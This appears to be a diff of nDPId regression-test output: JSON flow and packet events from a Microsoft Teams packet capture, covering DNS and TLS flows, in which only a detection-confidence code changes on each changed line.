00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1587041685104,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":173,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":173,"pkt_l4_len":139,"thread_ts_msec":1587041685104,"pkt":"KDc3AG3IEBMx8Tl2CABFAACfqZ9AADkRFFfAqAEBwKgBBgA10a4AiwAA9AGBgAABAAIAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AABwAAcAMAAUAAQAADYsAHg90cm91dGVyMi1hc3NlLWEIY2xvdWRhcHADbmV0AMBJABwAAQAAAAUAECoBARHxAHAAAAAAAG\/dVKE="} -00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041685104,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"42.1.1.17"}} +00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041685104,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"42.1.1.17"}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1587041685105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"thread_ts_msec":1587041685105,"pkt":"KDc3AG3IEBMx8Tl2CABFAACTMl9AADkRi6PAqAEBwKgBBgA1\/s4AfwAAB0qBgAABAAIAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AAAEAAcAMAAUAAQAADNUAHg90cm91dGVyMi1hc3NlLWEIY2xvdWRhcHADbmV0AMBJAAEAAQAAAAgABDRyDy0="} -00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041685105,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.15.45"}} +00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041685105,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.15.45"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685106,"flow_last_seen":1587041685106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685106,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1587041685106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685106,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGNWvAqAEGNHIPLeyHAbsC\/Q6WAAAAALAC\/\/9IhwAAAgQFtAEDAwUBAQgKMIS4zgAAAAAEAgAA"} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1587041685127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1587041685127,"pkt":"KDc3AG3IEBMx8Tl2CABFAADKzTRAADkR8JbAqAEBwKgBBgA1xd0AtgAAqleBgAABAAMAAAAAA2FwaQtmbGlnaHRwcm94eQV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAA4OACoDYXBpC2ZsaWdodHByb3h5BXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsACcbYy1mbGlnaHRwcm94eS1ldW5vLTAxLXRlYW1zCGNsb3VkYXBwwGbAdwABAAEAAAAGAAQ0ck2I"} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041685127,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.136"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041685127,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.136"}} 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1587041685136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1587041685136,"pkt":"KDc3AG3IEBMx8Tl2CABFAADDZa9AADkRWCPAqAEBwKgBBgA17z0ArwAAVKqBgAABAAMAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAALoAAiBGV1YXoCdHIFdGVhbXMOdHJhZmZpY21hbmFnZXIDbmV0AMA5AAUAAQAAAAAAMBJiLXRyLXRlYW1zLWV1bm8tMDULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAJMBnAAEAAQAAAAoABDRy+ns="} -00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041685136,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.250.123"}} +00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041685136,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.250.123"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1587041685171,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685171,"pkt":"EBMx8Tl2KDc3AG3ICABFAABADGUAAP8RK\/DAqAEGwKgBAeRZADUALJr8l0UBAAABAAAAAAAAB291dGxvb2sGb2ZmaWNlA2NvbQAAAQAB"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1587041685185,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1587041685185,"pkt":"KDc3AG3IEBMx8Tl2CABFAADeqaxAADkRFAvAqAEBwKgBBgA15FkAygAAl0WBgAABAAYAAAAAB291dGxvb2sGb2ZmaWNlA2NvbQAAAQABwAwABQABAAAANQAMCXN1YnN0cmF0ZcAUwDAABQABAAAAxQAUCXN1YnN0cmF0ZQdtcy1hY2RjwBTASAAFAAEAAAAmAAgFYWZkLWvAFMBoAAUAAQAAACYAKBJvdXRsb29rLW9mZmljZS1jb20Gay0wMDAyCGstbXNlZGdlA25ldADAfAAFAAEAAACgAALAj8CPAAEAAQAAAJ8ABA1rEgs="} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041685185,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041685185,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685232,"flow_last_seen":1587041685232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685232,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1587041685232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685232,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyIAbtyjZOTAAAAALAC\/\/8ViAAAAgQFtAEDAwUBAQgKMIS5SgAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685240,"flow_last_seen":1587041685240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685240,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1587041685240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685240,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyKAbtGGzTNAAAAALAC\/\/8rVAAAAgQFtAEDAwUBAQgKMIS5UgAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1587041685243,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041685243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPU3QAAP8R5NHAqAEGwKgBAchtADUAO5eNyGMBAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAAB"} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685248,"flow_last_seen":1587041685248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1587041685248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685248,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyLAbsws\/klAAAAALAC\/\/\/xvAAAAgQFtAEDAwUBAQgKMIS5WgAAAAAEAgAA"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685251,"flow_last_seen":1587041685251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685251,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1587041685251,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685251,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4XAqAEGKH4JB+yMAbvF6IfFAAAAALAC\/\/8d8gAAAgQFtAEDAwUBAQgKMIS5XQAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1587041685253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685253,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0w5JAAHUGiY00ccKEwKgBBgG77IqoHlkCRhs0zoAS\/\/9MIAAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1587041685253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685253,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyKAbtGGzTOqB5ZA1AQIABs3wAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1587041685256,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1587041685256,"pkt":"KDc3AG3IEBMx8Tl2CABFAACb\/nFAADkRv4jAqAEBwKgBBgA1yG0AhwAAyGOBgAABAAAAAQAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAABwCEABgABAAAADgBABHByZDEOYXp1cmVkbnMtY2xvdWTAKgZtc25oc3QJbWljcm9zb2Z0A2NvbQB9o\/w8AAADhAAAASwACTqAAAAAPA=="} 